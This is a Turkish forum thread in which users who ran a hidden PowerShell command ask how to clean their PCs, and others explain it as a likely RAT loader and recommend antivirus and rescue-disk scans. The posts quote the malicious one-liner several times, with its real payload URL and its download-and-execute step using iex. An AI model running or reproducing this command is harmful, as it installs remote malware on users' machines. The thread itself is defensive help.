Powershell virüsü nasıl temizlenir?

Laey · 17 Kasım 2024

(Powershell.exe -w hidden -command $url = 'https://validitytextv1.b-cdn.net/power.txt'; $response = ınvoke-webrequest -uri $url -usebasicparsing; $text = $response. Content; iex $text gibi bir şey girdim. çalıştıra daha yeni fark ettim anında dalgındım nasıl temizlerim? Nedir ne değildir?

zamkino · 19 Kasım 2024

var mı bilgisi olan ben de aynı şeyi yaşadım dalgınlıkla

Giray Han · 19 Kasım 2024

Laey dedi:
(Powershell.exe -w hidden -command $url = 'https://validitytextv1.b-cdn.net/power.txt'; $response = ınvoke-webrequest -uri $url -usebasicparsing; $text = $response. Content; iex $text gibi bir şey girdim. çalıştıra daha yeni fark ettim anında dalgındım nasıl temizlerim? Nedir ne değildir?

zamkino dedi:
var mı bilgisi olan ben de aynı şeyi yaşadım dalgınlıkla

Türkçe meali ; Potansiyel zararlı işlemdir. RAT olabilir.

Detaylar ;

-w hidden: Bu, PowerShell penceresinin gizlenmesini sağlar, yani komutlar arka planda çalıştırılır ve kullanıcıya görünmez.

$url = 'https://validitytextv1.b-cdn.net/power.txt': Bu satırda, komutun bir URL (https://validitytextv1.b-cdn.net/power.txt) üzerinden bir dosya çekmesi için belirli bir URL atanmış.

$response = invoke-webrequest -uri $url -usebasicparsing: Bu satır, belirtilen URL'den bir dosya indirmeye çalışır.

$text = $response.Content: İndirilen dosyanın içeriği bir değişkende saklanır.

iex $text: iex (Invoke-Expression), PowerShell içindeki komutları çalıştıran bir komuttur. Burada, indirilen metin bir PowerShell komutu olarak çalıştırılacaktır.

Yapmanız gerekenler;

Free Rescue Disk Download | Kaspersky Linkinden İSO dosyasını indirip RUFUS aracılığı ile USB'ye yazdırın ve başlangıçta BOOT ederek sistemi komple taratın. Ayrıca Uzun bir süre Kaspersky Total Security bilgisayarınızda kurulu kalsın.

Laey · 19 Kasım 2024

Ben USB ye neden yazdıracaktım acaba ben ilk reset attım bilgisayarı taratıp ve şifreleri değiştirdim sorun olurmu

Giray Han dedi:
Türkçe meali ; Potansiyel zararlı işlemdir. RAT olabilir.

Detaylar ;

-w hidden: Bu, PowerShell penceresinin gizlenmesini sağlar, yani komutlar arka planda çalıştırılır ve kullanıcıya görünmez.

$url = 'https://validitytextv1.b-cdn.net/power.txt': Bu satırda, komutun bir URL (https://validitytextv1.b-cdn.net/power.txt) üzerinden bir dosya çekmesi için belirli bir URL atanmış.

$response = invoke-webrequest -uri $url -usebasicparsing: Bu satır, belirtilen URL'den bir dosya indirmeye çalışır.

$text = $response.Content: İndirilen dosyanın içeriği bir değişkende saklanır.

iex $text: iex (Invoke-Expression), PowerShell içindeki komutları çalıştıran bir komuttur. Burada, indirilen metin bir PowerShell komutu olarak çalıştırılacaktır.

Yapmanız gerekenler;

Free Rescue Disk Download | Kaspersky Linkinden İSO dosyasını indirip RUFUS aracılığı ile USB'ye yazdırın ve başlangıçta BOOT ederek sistemi komple taratın. Ayrıca Uzun bir süre Kaspersky Total Security bilgisayarınızda kurulu kalsın.

zamkino · 19 Kasım 2024

Malwarebytes indirip tarattım, bilgisayarı açtığımda sürekli Google'dan bir sayfa açıp bir şeyler indirtmeye çalışan, zararlı yazılımı tespit edip sildi. Ben bu şekilde çözdüm.

Turkıye anlasması · 19 Kasım 2024

HijackThis+ kullan antivirüslerin bunu bulacağını zannetmiyorum.

zamkino · 19 Kasım 2024

Turkıye anlasması dedi:
HijackThis+ kullan antivirüslerin bunu bulacağını zannetmiyorum.

Nasıl yani hocam aslında çözüşmemiştir sana öyle gelmiştir mi diyorsunuz.

Turkıye anlasması · 20 Kasım 2024

zamkino dedi:
Nasıl yani hocam aslında çözüşmemiştir sana öyle gelmiştir mi diyorsunuz.

HijackThis+ bilgisayarın durumunu anlamamıza yardımcı olan bir araçtır ve agresiftir. Böylece tespit edilmeyen virüsleri görebiliriz.

Shediara · 17 Şubat 2025

Turkıye anlasması dedi:
HijackThis+ bilgisayarın durumunu anlamamıza yardımcı olan bir araçtır ve agresiftir. Böylece tespit edilmeyen virüsleri görebiliriz.

Nereden indirebilirim acaba var mıdır güvenli bir yer.

Turkıye anlasması · 19 Şubat 2025

Shediara dedi:
Nereden indirebilirim acaba var mıdır güvenli bir yer.

Sabitlenmiş konuda var. HijackThis+ raporu diye. Kendim bu programı derlemiştim. Çok güzel bir program.

Powershell virüsü nasıl temizlenir?

Laey

Femtopat

zamkino

Hectopat

Giray Han

Kilopat

Laey

Femtopat

zamkino

Hectopat

Turkıye anlasması

Megapat

zamkino

Hectopat

Turkıye anlasması

Megapat

Shediara

Decapat

Turkıye anlasması

Megapat